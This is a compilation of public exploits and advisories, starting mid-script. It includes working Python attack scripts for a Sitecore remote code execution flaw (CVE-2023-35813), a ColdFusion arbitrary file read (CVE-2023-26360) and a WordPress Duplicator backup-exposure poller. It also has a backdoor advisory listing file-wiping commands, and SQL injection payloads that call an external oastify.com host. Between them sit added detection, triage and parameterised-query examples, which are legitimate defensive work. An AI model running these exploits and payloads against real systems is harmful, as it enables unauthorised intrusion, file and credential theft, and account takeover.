        payload_choice = input("Enter your choice (1, 2, or 3): ")

        payload = get_payload(payload_choice)
        encoded_payload = quote(payload)

        url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)

        response = requests.post(url, headers=headers, data=data)

        if 'Content-Type' in response.headers:
            print("Content-Type from the response header:")
            print("\n")
            print(response.headers['Content-Type'])
        else:
            print("No Content-Type in the response header. Status Code:", response.status_code)
    else:
        print("The target does not appear to be vulnerable to CVE-2023-35813.")


if __name__ == "__main__":
    console.print("[bold green]Author: Abhishek Morla[/bold green]")
    console.print("[bold red]CVE-2023-35813[/bold red]")
    parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore')
    parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance')
    args = parser.parse_args()

    main(args.hostname)
</code></pre>
<pre><code># Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360<br /># Google Dork: [not]<br /># Date: [12/28/2023]<br /># Exploit Author: [Youssef Muhammad]<br /># Vendor Homepage: [https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]<br /># Software Link: [https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]<br /># Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier]<br /># Tested on: [Windows, Linux]<br /># CVE : [CVE-2023-26360]<br /><br />import sys<br />import requests<br />import json<br /><br />BANNER = """<br /> ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ <br /> ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████ <br /> ██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ █████ ███████ █████ ███████ ██ ██ ██ <br /> ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ <br /> ██████ ████ ███████ ███████ ██████ ███████ ██████ ███████ ██████ ██████ ██████ ██████ <br />"""<br /><br /># ANSI colour escapes (ESC is \033; the green escape was mistyped as \032 in the original)<br />RED_COLOR = "\033[91m"<br />GREEN_COLOR = "\033[42m"<br />RESET_COLOR = "\033[0m"<br /><br />def print_banner():<br />    print(RED_COLOR + BANNER + " Developed by SecureLayer7" + RESET_COLOR)<br />    return 0<br /><br />def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):<br />    if not endpoint.endswith('.cfc'):<br />        endpoint += '.cfc'<br /><br />    if target_file.endswith('.cfc'):<br />        raise ValueError('The TARGET_FILE must not point to a .cfc')<br /><br />    # The requested file is passed as the classname inside the _variables JSON<br />    targeted_file = f"a/{target_file}"<br />    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})<br /><br />    vars_get = {'method': 'test', '_cfclient': 'true'}<br />    uri = f'{host}{endpoint}'<br /><br />    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)<br /><br />    # The file contents are echoed back ahead of this marker in the error page<br />    file_data = None<br />    splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>'<br /><br />    if response.status_code in [404, 500] and splatter in response.text:<br />        file_data = response.text.split(splatter, 1)[0]<br /><br />    if file_data is None:<br />        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')<br /><br />    print(file_data)<br /><br />    # Save the output to a file<br />    output_file_name = 'output.txt'<br />    with open(output_file_name, 'w') as output_file:<br />        output_file.write(file_data)<br />    print(f"The output saved to {output_file_name}")<br /><br />if __name__ == "__main__":<br />    if not 3 <= len(sys.argv) <= 5:<br />        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")<br />        sys.exit(1)<br /><br />    print_banner()<br /><br />    host = sys.argv[1]<br />    target_file = sys.argv[2]<br />    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"<br />    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None<br /><br />    try:<br />        run_exploit(host, target_file, endpoint, proxy_url)<br />    except Exception as e:<br />        print(f"Error: {e}")<br /><br /></code></pre>
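The two scripts above, for CVE-2023-35813 and CVE-2023-26360, each leave a distinctive shape in the HTTP request: a POST to sitecore_xaml.ashx whose __PARAMETERS value wraps attacker markup in ParseControl(), and a POST to a .cfc endpoint with _cfclient=true whose _variables JSON sets _metadata.classname to a file path. The following is an added example of request-level detection for both patterns; it is not code from either exploit author, from Sitecore or from Adobe. The hostnames, request bodies and the classname sample are constructed, and the "path-like classname" heuristic is an assumption drawn from the exploit's `a/{target_file}` construction.

```python
"""Request-level detection for the two exploit patterns above (added example).

Not code from either exploit, from Sitecore or from Adobe. Models an HTTP
request as a dict and flags: a POST to sitecore_xaml.ashx whose __PARAMETERS
invokes ParseControl(...) (CVE-2023-35813), and a request to a .cfc endpoint
with _cfclient=true whose _variables JSON names a classname containing a path
separator or '..' (CVE-2023-26360). Sample requests are constructed.
"""
import json
import re
from urllib.parse import parse_qs, quote, urlparse


def parse_request(raw):
    """Split raw HTTP/1.1 request text into method, path, query, headers and form body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    parsed = urlparse(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {
        "method": method,
        "path": parsed.path,
        "query": {k: v[0] for k, v in parse_qs(parsed.query).items()},
        "headers": headers,
        "form": {k: v[0] for k, v in parse_qs(body).items()},  # parse_qs URL-decodes values
    }


def check_sitecore_xaml(req):
    """CVE-2023-35813 indicator: a XAML event asking the handler to ParseControl() client markup."""
    if not req["path"].lower().startswith("/sitecore_xaml.ashx"):
        return None
    params = req["form"].get("__PARAMETERS", "")
    if req["form"].get("__ISEVENT") == "1" and re.search(r"ParseControl\s*\(", params):
        return "CVE-2023-35813: ParseControl() event sent to sitecore_xaml.ashx"
    return None


def check_coldfusion_cfc(req):
    """CVE-2023-26360 indicator: _cfclient=true with a file-path-like _metadata.classname."""
    if not req["path"].lower().endswith(".cfc"):
        return None
    if req["query"].get("_cfclient", "").lower() != "true":
        return None
    raw_vars = req["form"].get("_variables")
    if raw_vars is None:
        return None
    try:
        classname = json.loads(raw_vars)["_metadata"]["classname"]
    except (ValueError, KeyError, TypeError):
        return None
    if not isinstance(classname, str):
        return None
    if "/" in classname or "\\" in classname or ".." in classname:  # assumption: real CFC names are dotted
        return f"CVE-2023-26360: _metadata.classname {classname!r} is a file path, not a CFC name"
    return None


def inspect(raw):
    """Return the list of findings for one raw request."""
    req = parse_request(raw)
    return [f for f in (check_sitecore_xaml(req), check_coldfusion_cfc(req)) if f]


# Constructed samples (not captured traffic); hostnames are placeholders.
SITECORE_REQ = (
    "POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1\r\n"
    "Host: sitecore.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"" + quote("<%@Register TagPrefix='x' %>") + "\")"
)
COLDFUSION_REQ = (
    "POST /CFIDE/wizards/common/utils.cfc?method=test&_cfclient=true HTTP/1.1\r\n"
    "Host: cf.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "_variables=" + quote('{"_metadata": {"classname": "a/../../../etc/passwd"}, "_variables": []}')
)
BENIGN_CFC_REQ = (
    "POST /CFIDE/wizards/common/utils.cfc?method=test&_cfclient=true HTTP/1.1\r\n"
    "Host: cf.example\r\n\r\n"
    "_variables=" + quote('{"_metadata": {"classname": "cfide.wizards.common.utils"}, "_variables": []}')
)

if __name__ == "__main__":
    for name, raw in (("sitecore", SITECORE_REQ), ("coldfusion", COLDFUSION_REQ), ("benign", BENIGN_CFC_REQ)):
        print(name, inspect(raw) or "clean")
```

Both checks key on what the exploits must send to work (the event flag plus ParseControl, and the client-side `_cfclient` mode plus a classname that is a path), so they survive cosmetic changes to the payload; the benign sample shows that an ordinary dotted CFC name through the same endpoint is not flagged.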
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/6268df4c9c805c90725dde4fe5ef6fea.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Beastdoor.oq<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 1332, makes outbound connections to SMTP port 25 and executes a PE file named svchost.exe dropped in the Windows directory. Third-party adversaries who can reach an infected host can issue various numeric commands made available by the backdoor.<br />Family: Beastdoor<br />Type: PE32<br />MD5: 6268df4c9c805c90725dde4fe5ef6fea<br />Vuln ID: MVID-2024-0674<br />Dropped files: svchost.exe<br />Disclosure: 03/09/2024<br /><br />Commands:<br />27 returns the victim's username and computer information<br />5 or 19 shut down the victim's computer<br />6 restarts the victim's computer<br />9 deletes all files, including program files<br />16 turns the victim's screen black<br />28 returns clipboard information<br />30 terminates the backdoor and deletes it from the system<br /><br />Exploit/PoC:<br />C:\sec>nc64.exe x.x.x.x 1332<br />27<br />27<br />VICTIM DESKTOP-2C3IQHO Windows 8.1 Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHzC:\WINDOWS\C:\WINDOWS\system32\1565 x 8302.01svchost.exe svchost.exe<br />28<br />28<br />I dont like u<br />30<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
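The advisory above gives four host-level indicators: a listener on TCP 1332, a file named svchost.exe dropped in the Windows directory (rather than System32), outbound SMTP connections from it, and the sample's MD5. The following is an added example, not from the Malvuln advisory or from any vendor, that turns those into a triage routine over `netstat -ano` output and a process inventory. The netstat text, process table and hash table are constructed; treating System32 and SysWOW64 as the only expected locations for svchost.exe is an assumption.

```python
"""Endpoint triage for the Beastdoor.oq indicators in the advisory above (added example).

Not part of the Malvuln advisory. Joins rows of `netstat -ano` output with a
{pid: image path} process inventory and reports: a process listening on TCP
1332; svchost.exe running from outside System32/SysWOW64; outbound SMTP (tcp/25)
from any process already flagged; and any file whose MD5 equals the advisory's
sample hash. The sample netstat text, process table and hashes are constructed.
"""
import hashlib
import ntpath
import re

BEASTDOOR_PORT = 1332
BEASTDOOR_MD5 = "6268df4c9c805c90725dde4fe5ef6fea"  # MD5 given in the advisory
EXPECTED_SVCHOST_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")  # assumption

NETSTAT_ROW = re.compile(
    r"^\s*TCP\s+\S+:(\d+)\s+\S+:(\d+)\s+(LISTENING|ESTABLISHED)\s+(\d+)\s*$", re.IGNORECASE)


def parse_netstat(text):
    """Return [(state, local_port, remote_port, pid)] for TCP rows of `netstat -ano` output."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_ROW.match(line)
        if m:
            rows.append((m.group(3).upper(), int(m.group(1)), int(m.group(2)), int(m.group(4))))
    return rows


def md5_of_file(path):
    """MD5 of a file on disk, for building the hash table passed to triage()."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def triage(netstat_text, processes, file_hashes):
    """processes: {pid: image path}; file_hashes: {path: md5 hex}. Returns a list of findings."""
    findings = []
    suspicious = set()
    rows = parse_netstat(netstat_text)
    for state, lport, _rport, pid in rows:
        if state == "LISTENING" and lport == BEASTDOOR_PORT:
            findings.append(f"pid {pid} ({processes.get(pid, '?')}) is listening on tcp/{lport}")
            suspicious.add(pid)
    for pid, image in processes.items():
        if ntpath.basename(image).lower() == "svchost.exe":
            if ntpath.dirname(image).lower() not in EXPECTED_SVCHOST_DIRS:
                findings.append(f"pid {pid}: svchost.exe running from unexpected path {image}")
                suspicious.add(pid)
    for state, _lport, rport, pid in rows:
        if state == "ESTABLISHED" and rport == 25 and pid in suspicious:
            findings.append(f"pid {pid} has an outbound SMTP connection (tcp/25)")
    for path, digest in file_hashes.items():
        if digest.lower() == BEASTDOOR_MD5:
            findings.append(f"{path}: MD5 matches the Beastdoor.oq sample")
    return findings


# Constructed sample data (not from a real host).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:1332           0.0.0.0:0              LISTENING       4120
  TCP    192.168.1.20:49711     203.0.113.5:25         ESTABLISHED     4120
  TCP    [::]:445               [::]:0                 LISTENING       4
"""
SAMPLE_PROCESSES = {
    908: r"C:\Windows\System32\svchost.exe",
    4120: r"C:\WINDOWS\svchost.exe",
    4: "System",
}
# Constructed: pretend the dropped file hashed to the advisory's sample.
SAMPLE_HASHES = {r"C:\WINDOWS\svchost.exe": BEASTDOOR_MD5}

if __name__ == "__main__":
    for finding in triage(SAMPLE_NETSTAT, SAMPLE_PROCESSES, SAMPLE_HASHES):
        print(finding)
```

The port and hash checks are brittle on their own (a rebuilt sample changes both), so the path check is the one that generalises: the real svchost.exe is a Windows system binary and does not run from the Windows directory root.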
<pre><code># Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover<br /># Google Dork: inurl:("plugins/duplicator/")<br /># Date: 2023-12-04<br /># Exploit Author: Dmitrii Ignatyev<br /># Vendor Homepage: https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free<br /># Software Link: https://wordpress.org/plugins/duplicator/<br /># Version: 1.5.7.1<br /># Tested on: WordPress 6.4<br /># CVE : CVE-2023-6114<br /># CVE-Link : https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/<br /># CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/<br /><br />A severe vulnerability has been discovered in the directory *wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but, more critically, it provides unauthorized access to sensitive data within the database. Exploiting this vulnerability poses an imminent threat, leading to potential *brute force attacks on password hashes and, subsequently, the compromise of the entire system*.<br /><br />*POC*:<br /><br />1) A backup must be running: either the administrator starts one, or the auto-backup runs at its scheduled time<br /><br />2) The exploit sends file search requests every 5 seconds<br /><br />3) I attack the site with this vulnerability using an exploit<br /><br />The exploit sends a request to the server every 5 seconds for the path *http://your_site/wordpress/wp-content/backups-dup-lite/tmp/*, and if it finds anything in the directory index, it immediately parses all the data and displays it on the screen<br /><br />Exploit (python3):<br /><br />import requests<br />from bs4 import BeautifulSoup<br />import re<br />import time<br /><br />url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"<br />processed_files = set()<br /><br />def get_file_names(url):<br />    # Fetch the directory index and collect the file links it lists<br />    response = requests.get(url)<br /><br />    if response.status_code == 200 and len(response.text) > 0:<br />        soup = BeautifulSoup(response.text, 'html.parser')<br />        links = soup.find_all('a')<br /><br />        file_names = []<br />        for link in links:<br />            file_name = link.get('href')<br />            if file_name and file_name != "../" and not file_name.startswith("?"):<br />                file_names.append(file_name)<br /><br />        return file_names<br />    return []<br /><br />def get_file_content(url, file_name):<br />    file_url = url + file_name<br /><br />    # Skip archives; only the plain-text files are read<br />    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):<br />        print(f"Ignoring file: {file_name}")<br />        return None<br /><br />    file_response = requests.get(file_url)<br /><br />    if file_response.status_code == 200:<br />        return file_response.text<br />    return None<br /><br />while True:<br />    file_names = get_file_names(url)<br /><br />    if file_names:<br />        print("File names on the page:")<br />        for file_name in file_names:<br />            if file_name not in processed_files:<br />                print(file_name)<br />                file_content = get_file_content(url, file_name)<br /><br />                if file_content is not None:<br />                    print("File content:")<br />                    print(file_content)<br />                processed_files.add(file_name)<br /><br />    time.sleep(5)<br /><br /><br /><br />-- <br />With best regards,<br />Dmitrii Ignatyev, Penetration Tester<br /><br /></code></pre>
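The polling behaviour described above (a request to wp-content/backups-dup-lite/tmp/ every 5 seconds, then a fetch of whatever the directory index lists) is easy to spot server-side. The following is an added example, not part of the advisory or of the Duplicator plugin: an access-log analyser that flags clients polling that directory at a steady interval or reading files from it. The log lines are constructed, example_scan.json is a placeholder file name, and the MIN_POLLS and MAX_JITTER thresholds are assumptions.

```python
"""Spot the polling pattern above in web-server access logs (added example).

Not part of the advisory or of the Duplicator plugin. Parses Apache
combined-format lines (constructed below), groups requests to the Duplicator
tmp directory by client address, and flags clients that hit the directory
index at a near-constant interval or that successfully fetch files from it.
"""
import re
from collections import defaultdict
from datetime import datetime

DUP_TMP = "/wp-content/backups-dup-lite/tmp/"
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
MIN_POLLS = 4      # assumption: four index hits are enough to call it polling
MAX_JITTER = 2.0   # assumption: allowed deviation (seconds) from the median interval


def parse_line(line):
    """Parse one Apache combined-format line; returns None if it does not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, _size = m.groups()
    return {
        "ip": ip,
        "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
        "method": method,
        "path": target.split("?", 1)[0],
        "status": int(status),
    }


def analyse(lines):
    """Return findings for clients polling or reading the Duplicator tmp directory."""
    index_hits = defaultdict(list)   # ip -> times the directory index was requested
    file_reads = defaultdict(set)    # ip -> paths under the directory fetched with 200
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        pos = rec["path"].find(DUP_TMP)   # find() so sub-directory installs match too
        if pos < 0:
            continue
        remainder = rec["path"][pos + len(DUP_TMP):]
        if remainder == "":
            index_hits[rec["ip"]].append(rec["time"])
        elif rec["status"] == 200:
            file_reads[rec["ip"]].add(rec["path"])

    findings = []
    for ip, times in index_hits.items():
        if len(times) < MIN_POLLS:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median = sorted(gaps)[len(gaps) // 2]
        if all(abs(g - median) <= MAX_JITTER for g in gaps):
            findings.append(f"{ip}: polled {DUP_TMP} {len(times)} times, ~{median:.0f}s apart")
    for ip, paths in file_reads.items():
        findings.append(f"{ip}: read {len(paths)} file(s) from {DUP_TMP}: " + ", ".join(sorted(paths)))
    return findings


# Constructed log lines (not from a real server).
SAMPLE_LOG = """\
203.0.113.9 - - [10/Dec/2023:14:03:00 +0000] "GET /wordpress/wp-content/backups-dup-lite/tmp/ HTTP/1.1" 403 199 "-" "python-requests/2.31.0"
198.51.100.4 - - [10/Dec/2023:14:03:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2023:14:03:05 +0000] "GET /wordpress/wp-content/backups-dup-lite/tmp/ HTTP/1.1" 403 199 "-" "python-requests/2.31.0"
203.0.113.9 - - [10/Dec/2023:14:03:10 +0000] "GET /wordpress/wp-content/backups-dup-lite/tmp/ HTTP/1.1" 403 199 "-" "python-requests/2.31.0"
203.0.113.9 - - [10/Dec/2023:14:03:15 +0000] "GET /wordpress/wp-content/backups-dup-lite/tmp/ HTTP/1.1" 200 2310 "-" "python-requests/2.31.0"
203.0.113.9 - - [10/Dec/2023:14:03:16 +0000] "GET /wordpress/wp-content/backups-dup-lite/tmp/example_scan.json HTTP/1.1" 200 88211 "-" "python-requests/2.31.0"
198.51.100.4 - - [10/Dec/2023:14:03:20 +0000] "GET /wordpress/wp-content/backups-dup-lite/tmp/ HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG.splitlines()):
        print(finding)
```

The 403 responses in the sample are deliberate: the polling is visible before the directory listing ever succeeds, which is the window in which to act (disable directory indexes for that path and block the client). The single hit from the second address is not flagged, since one request to the directory is not evidence of polling.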
<pre><code>## Title: RUPPEINVOICE-1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 03/09/2024<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The username parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+' was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability!<br /><br />STATUS: HIGH - Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: username (POST)<br />    Type: boolean-based blind<br />    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br />    Payload: username=zBuveHif'+(select load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'' OR NOT 6356=6356 AND 'Eocq'='Eocq&password=g7J!m3v!W2&login=<br /><br />    Type: time-based blind<br />    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />    Payload: username=zBuveHif'+(select load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'' AND (SELECT 4013 FROM (SELECT(SLEEP(7)))BnHP) AND 'bCQt'='bCQt&password=g7J!m3v!W2&login=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/RUPPEINVOICE-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/ruppeinvoice-10-multiple-sqli.html)<br /><br />## Time spent:<br />00:35:00<br /><br /><br /></code></pre>
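The boolean-based blind payload above works because the application splices the username into its SQL text, so the tail `OR NOT 6356=6356 AND 'Eocq'='Eocq` (a false condition) and its true counterpart produce observably different results, which is the yes/no oracle a blind probe reads. The following is an added example, not code from RUPPEINVOICE or from the advisory: the vulnerable lookup next to a parameterised one, using sqlite3 in memory as a stand-in for the application's MySQL database, so the MySQL-only load_file() and SLEEP() parts of the payloads are dropped and only the boolean tail is kept. The users table, its one row and the exact shape of the application's query are assumptions.

```python
"""Why the boolean-based blind payload above yields a yes/no oracle, and how binding removes it.

Added example; not code from RUPPEINVOICE (a PHP/MySQL application) or from the
advisory. sqlite3 in memory stands in for MySQL. find_user_vulnerable() splices
the username into the SQL text, the behaviour the advisory reports for the
username parameter; find_user_safe() binds it. Table, row and query shape are
assumptions.
"""
import sqlite3

# Boolean tails of the advisory's payload: FALSE_PAYLOAD is the advisory's own (6356=6356 makes the
# injected condition false); TRUE_PAYLOAD is the counterpart a blind probe compares it against.
TRUE_PAYLOAD = "zBuveHif' OR NOT 6356=6357 AND 'Eocq'='Eocq"
FALSE_PAYLOAD = "zBuveHif' OR NOT 6356=6356 AND 'Eocq'='Eocq"


def make_db():
    """In-memory stand-in for the application's users table (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'constructed-hash')")
    con.commit()
    return con


def find_user_vulnerable(con, username):
    """Concatenates untrusted input into the statement: the flaw the advisory reports."""
    # username='zBuveHif' OR NOT 6356=6357 AND 'Eocq'='Eocq'  -> OR (true AND true) -> every row
    sql = f"SELECT username FROM users WHERE username='{username}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def find_user_safe(con, username):
    """Same lookup with a bound parameter: the payload is compared as a literal string."""
    row = con.execute("SELECT username FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None


def boolean_oracle_exists(finder):
    """True when a true and a false injected condition give different results (the blind signal)."""
    con = make_db()
    return finder(con, TRUE_PAYLOAD) != finder(con, FALSE_PAYLOAD)


if __name__ == "__main__":
    print("vulnerable lookup exposes a boolean oracle:", boolean_oracle_exists(find_user_vulnerable))
    print("parameterised lookup exposes a boolean oracle:", boolean_oracle_exists(find_user_safe))
```

The fix is the bound parameter, not input filtering: with `?` placeholders the quote, the OR and the comparison in the payload never reach the SQL parser, so both payloads simply fail to match a username and the oracle disappears. In the PHP application this is the same change made with prepared statements (mysqli or PDO).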